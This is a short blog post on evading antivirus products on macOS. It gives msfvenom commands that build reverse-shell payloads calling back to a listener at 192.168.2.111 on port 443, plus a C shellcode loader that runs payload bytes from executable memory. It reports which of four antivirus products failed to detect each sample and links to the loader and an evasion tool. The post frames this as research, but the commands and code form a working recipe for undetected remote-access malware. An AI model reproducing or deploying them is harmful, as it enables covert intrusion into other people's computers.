Antivirus Evasion on OSX

A few months ago I did some research on antivirus (evasion) on OSX and now I decided to write a blog post about it.

Scope
* build executables that are not recognized by Antivirus Mac OSX
* for building Mac OSX executables you need Mac OSX
* shellcode/payload with MSF
* developed with C & some assembly
* main focus is learning and automatiziation

Why?
Some high profile targets use OSX… so AV might be a thing.

Dmitry Medvedev:

http://obamapacman.com/2009/08/russia-president-dmitry-medvedev-mac-user-kremlin/

As do some security researchers 😉

Charlie Miller:

https://en.wikipedia.org/wiki/Charlie_Miller_(security_researcher)#/media/File:CharlieMillerHolmanSpeaker2015-20.jpg

Targeted Malware

… or like APT 28:

https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf

Test Cases and PoCs
* eicar
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o osx64_reverse_xor.out
* msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -f macho -o osx64_reverse.out
* msfvenom -p osx/x86/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 –platform OSX -f macho -o osx86_reverse.out
* gcc -o osx64_sc_binder.out osx64_sc_binder.c

osx64_sc_binder.c

#include <string.h>
#include <sys/mman.h>
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
...
"\x15";

int main(int argc, char **argv)
{
  void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
  memcpy(ptr,buf,sizeof buf);
  void (*fp)() = (void (*)())ptr;
  fp();
}

And then some testing….

Comodo
… found nothing, only eicar.

Sophos
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c

Avast
Recognized as malicious:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
Not recognized: osx64_sc_binder.c

Avira
Not recognized:
msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.2.111 LPORT=443 -a x64 –platform OSX -e x64/xor -f macho -o a.out
… no further testing.

Finally
As can be seen, not much efford is needed for evading AV software on MacOSX, The shellcode binder was enough for evading all tested platforms.
The binder: https://github.com/govolution/avepoc/blob/master/osx64_sc_binder.c

Nevertheless I made a small PoC version of AVET (based on the old version 1.3) for OSX (https://github.com/govolution/avetosx):

Maybe I will try to integrate it in AVET 2 some time.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.